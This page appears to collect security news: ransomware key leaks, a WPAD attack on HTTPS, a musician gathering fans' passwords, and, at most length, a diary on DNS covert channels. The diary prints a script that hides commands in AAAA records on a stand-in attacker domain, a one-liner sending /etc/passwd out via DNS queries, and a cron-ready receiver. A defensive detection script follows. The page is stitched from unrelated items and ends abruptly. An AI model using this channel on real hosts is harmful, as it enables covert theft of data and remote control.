Information Security News
Sometimes, the fierce competition in the booming crypto ransomware market works in the favor of the victims whose priceless data is held hostage. That appears to be what played out on Tuesday when the criminals behind a package known as "Mischa" published what's purported to be the secret crypto keys for the rival Chimera malware.
"Earlier this year we got access to big parts of their deveolpment [sic] system, and included parts of Chimera in our project," the Mischa developers wrote in a message posted to Pastebin. "Additionally we now release about 3500 decryption keys from Chimera."
Translation: As if breaking in to the Chimera developers' network and stealing their code wasn't enough of an affront, the competing Mischa gang now claims to have leaked the keys that defang Chimera.
A key guarantee provided by HTTPS encryption is that the addresses of visited websites aren't visible to attackers who may be monitoring an end user's network traffic. Now, researchers have devised an attack that breaks this protection.
The attack can be carried out by operators of just about any type of network, including public Wi-Fi networks, which arguably are the places where Web surfers need HTTPS the most. It works by abusing a feature known as WPAD—short for Web Proxy Autodiscovery—in a way that exposes certain browser requests to attacker-controlled code. The attacker then gets to see the entire URL of every site the target visits. The exploit works against virtually all browsers and operating systems. It will be demonstrated for the first time at next week's Black Hat security conference in Las Vegas in a talk titled Crippling HTTPS with Unholy PAC.
"People rely on HTTPS to secure their communication even when the LAN/Wi-Fi cannot be trusted (think public Wi-Fi/hotels/cafes/airports/restaurants, or compromised LAN in an organization)," Itzik Kotler, cofounder and CTO of security firm SafeBreach and one of the scheduled speakers, wrote in an e-mail. "We show that HTTPS cannot provide security when WPAD is enabled. Therefore, a lot of people are actually exposed to this attack when they engage in browsing via non-trusted networks."
Data exfiltration and command and control channels via DNS are nothing new exactly. In many ways, DNS is an ideal covert channel. Even well-protected systems usually can connect to a recursive name server that will forward queries to any authoritative name server. The bucket chain of DNS servers will bypass whatever firewall is used to protect the system. Intrusion detection systems have implemented signatures for abnormally large queries, but valid domain names are often rather long, in particular if they are associated with public clouds or content delivery networks. DNSSEC records also tend to trigger some of these signatures.
Traditionally, an infected system will exfiltrate data using A records, and then request new commands to be executed using TXT records. While A records work great to exfiltrate data, TXT records are more problematic as they are less commonly used and tend to stick out more.
Note that we are not interested in implementing a complete IP over DNS tunnel here like dnscat2 or iodine. We try to be stealthy on the network by using as few and as normal DNS queries as possible, and we are trying to be covert on the system by using common command line tools instead of installing additional software that may trigger anti-malware systems.
There are a couple of methods that can be used to return more meaningful data than an IPv4 address in a DNS A query response:
But to do either, we need a custom DNS server. I was trying to find a way to pass data back to the infected system without having to code up a new DNS server (OK, there is Scapy ... maybe that will be a second diary).
AAAA records, on the other hand, return four times as much data as A records, and by returning multiple AAAA records, we can encode reasonably complex commands. We could do the same with A records, but doing so with AAAA records turns out to be a lot simpler.
First, we need to encode a set of commands in AAAA records. To do this, we convert the content of the file we are trying to encode into hex, and then use the dynamic DNS utility nsupdate to add the respective records to our zone (I am using evilexample.com here):
file2ipv6.sh:
#!/bin/sh
# Read the file given as $1, split it into 14-byte chunks, and emit nsupdate
# commands that publish each chunk as one AAAA record on a.evilexample.com.
n=2000
echo server localhost
echo zone evilexample.com
# Remove any existing AAAA records for the name before adding the new set.
echo prereq yxrrset a.evilexample.com AAAA
echo update delete a.evilexample.com
echo send
# xxd -p -c 14 prints 28 hex digits per line; sed inserts a colon after every
# four digits (seven groups) and strips the trailing colon.
for b in `xxd -p -c 14 $1 | sed 's/..../&:/g' | sed 's/:$//'`; do
  # First group is a serial number so the receiver can restore the order.
  f=$n:$b
  # Pad a short final group (odd chunk length) out to four hex digits.
  f=`echo $f | sed 's/:..$/&00/'`
  # Pad a short final chunk with zero groups and cut to a full 39-character address.
  f=`echo $f:0000:0000:0000:0000:0000:0000:0000:0000 | head -c39`
  echo update add a.evilexample.com. 10 AAAA $f
  n=`expr $n + 1`
done
echo send
Let's encode the following string (in sample.txt):
for b in `xxd -p /etc/passwd`; do dig +short $b.evilexample.com; done
This command, once executed on the receiving end, will exfiltrate the content of /etc/passwd.
Next, we use file2ipv6.sh to create the necessary AAAA records. nsupdate will pass the commands to the authoritative name server. The dns.key is the update key for the zone you are using (if you configured one).
./file2ipv6.sh sample.txt | nsupdate -k dns.key
Once this completes, you should see the following AAAA records:
$ dig +short AAAA a.evilexample.com
2003:7274:2024:622e:6576:696c:6578:616d
2004:706c:652e:636f:6d3b:2064:6f6e:650a
2000:666f:7220:6220:696e:2060:7878:6420
2001:2d70:202f:6574:632f:7061:7373:7764
2002:603b:2064:6f20:6469:6720:2b73:686f
Note how the first two bytes are used as a serial number as the order in which the records are returned may change.
On the receiving end (infected system), we can now extract the data with a simple shell script:
dig +short AAAA a.evilexample.com | sort -n | cut -f2- -d: | tr -d : | xxd -p -c 14 -r
To execute the script above, just enclose it in backticks, add it to a cron job or whatever, and you have a command and control channel over IPv6. Best part: all you need on the infected host is a shell script.
You can find the script above on GitHub: https://github.com/DShield-ISC/IPv6DNSExfil
Why use bash vs. perl/python? Because it works!
How do we detect these covert channels?
The best method is likely to monitor the volume of DNS queries from particular hosts. Mail servers tend to send a lot of DNS queries, but other, normal servers will only send a few. You could implement rate limiting on the recursive name server to disrupt the covert channel, or just monitor your query logs or traffic logs to detect abnormal volumes of DNS traffic from particular hosts.
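As an added illustration of the volume-based detection described above (this is example code written for this page, not part of the diary or the IPv6DNSExfil repository), the script below reads a simplified resolver query log, counts queries per client, and also applies the two query-shape signals the diary mentions: long names and hex-only labels like the ones the sample command sends as $b.evilexample.com. The log format (timestamp, client IP, query name, query type), the sample lines, and all thresholds are constructed assumptions; a real deployment would baseline each host class (mail servers legitimately query a lot) and adapt the parser to its resolver's log format.

```python
import re
from collections import defaultdict
from statistics import mean

# Simplified, constructed log format: "<timestamp> <client-ip> <qname> <qtype>".
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qname>\S+)\s+(?P<qtype>\S+)$")
# A first label made only of hex digits and at least 16 chars long looks like
# encoded data rather than a hostname (assumed heuristic, not from the diary).
HEX_LABEL_RE = re.compile(r"^[0-9a-f]{16,}$")


def parse_log(text):
    """Yield (client, qname, qtype) for every well-formed line; skip the rest."""
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            yield m.group("client"), m.group("qname").lower().rstrip("."), m.group("qtype")


def analyze(text, volume_threshold=100, hex_fraction_threshold=0.5, mean_len_threshold=40):
    """Return {client: {"total", "distinct", "reasons"}} with the detection reasons
    that fired for each client. Thresholds are example values."""
    stats = defaultdict(lambda: {"total": 0, "names": set(), "hexlike": 0, "lengths": []})
    for client, qname, _qtype in parse_log(text):
        s = stats[client]
        s["total"] += 1
        s["names"].add(qname)
        s["lengths"].append(len(qname))
        if HEX_LABEL_RE.match(qname.split(".")[0]):
            s["hexlike"] += 1

    findings = {}
    for client, s in stats.items():
        reasons = []
        if s["total"] >= volume_threshold:          # the diary's primary signal
            reasons.append("high_volume")
        if s["hexlike"] / s["total"] >= hex_fraction_threshold:
            reasons.append("hex_labels")            # data carried in the hostname
        if mean(s["lengths"]) >= mean_len_threshold:
            reasons.append("long_names")            # the "large query" IDS signal
        findings[client] = {"total": s["total"], "distinct": len(s["names"]), "reasons": reasons}
    return findings


def build_sample_log():
    """Constructed sample traffic, not real logs: a workstation, a busy mail
    server, and a host running the AAAA-record loop described in the diary."""
    ts = "2016-08-01T10:00:00"
    lines = []
    for name in ("www.example.org", "cdn.example.net", "mail.example.org"):
        lines.append(f"{ts} 10.0.0.5 {name} A")
    for i in range(150):                            # many queries, ordinary names
        lines.append(f"{ts} 10.0.0.9 mx{i}.example.net MX")
    for i in range(60):                             # 28-hex-digit labels (14 bytes each)
        lines.append(f"{ts} 10.0.0.7 {i:028x}.evilexample.com A")
    for _ in range(5):                              # polling for new commands
        lines.append(f"{ts} 10.0.0.7 a.evilexample.com AAAA")
    return "\n".join(lines)


SAMPLE_LOG = build_sample_log()

if __name__ == "__main__":
    for client, f in sorted(analyze(SAMPLE_LOG).items()):
        print(f"{client:12} total={f['total']:4} distinct={f['distinct']:4} reasons={f['reasons']}")
```

On the constructed sample, the mail server trips only the volume check, the workstation trips nothing, and the exfiltrating host trips the two query-shape checks while staying under the volume threshold, which is why volume alone is a weak signal for a deliberately low-rate channel like the one in the diary.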
As a new way to connect with his fans, Jack Johnson—one half of the pop-rap duo Jack & Jack, not to be confused with the laid back Hawaiian singer-songwriter of the same name—has spent the last month soliciting social media passwords.
Using the hashtag #HackedByJohnson, the performer has tweeted at his fans to send him their passwords. (Why he didn’t go for the shorter and catchier #JackHack, we’ll never know.) Then, Johnson posts under his fans’ Twitter accounts, leaving a short personalized message, as them.
Here's one example: